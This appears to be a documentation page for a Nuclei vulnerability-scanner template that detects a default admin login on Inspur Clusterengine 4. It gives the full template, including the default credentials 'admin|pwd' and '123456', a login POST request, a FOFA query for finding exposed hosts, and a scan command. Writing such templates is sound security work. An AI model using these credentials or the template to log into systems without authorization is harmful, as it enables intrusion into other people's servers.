Skip to content

Inspur Clusterengine 4 - Default Admin Login

ID: inspur-clusterengine-default-login

Severity: high

Author: ritikchaddha

Tags: default-login,inspur,clusterengine

Inspur Clusterengine version 4 default admin login credentials were successful.

id: inspur-clusterengine-default-login
info:
name: Inspur Clusterengine 4 - Default Admin Login
author: ritikchaddha
severity: high
description: Inspur Clusterengine version 4 default admin login credentials were successful.
reference:
- https://blog.csdn.net/qq_36197704/article/details/115665793
classification:
cpe: cpe:2.3:a:inspur:clusterengine:*:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: inspur
product: clusterengine
fofa-query: title="TSCEV4.0"
tags: default-login,inspur,clusterengine
http:
- raw:
- |
POST /login HTTP/1.1
Host: {{Hostname}}
op=login&username={{username}}&password={{password}}
attack: pitchfork
payloads:
username:
- admin|pwd
password:
- 123456
host-redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: word
part: body
words:
- '"exitcode":0'
- type: word
part: header
words:
- "username=admin|pwd"
condition: and
- type: status
status:
- 200
# digest: 490a00463044022048b16185df6a3f0012a45b066bb0d9acf3e47a2408f4a9d11e66fb3f2946a092022070db3b97014cc61d541342baf093940d5a2ce322a9dab7a19ff424dae59cc1ee:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/default-logins/others/inspur-clusterengine-default-login.yaml"

View on Github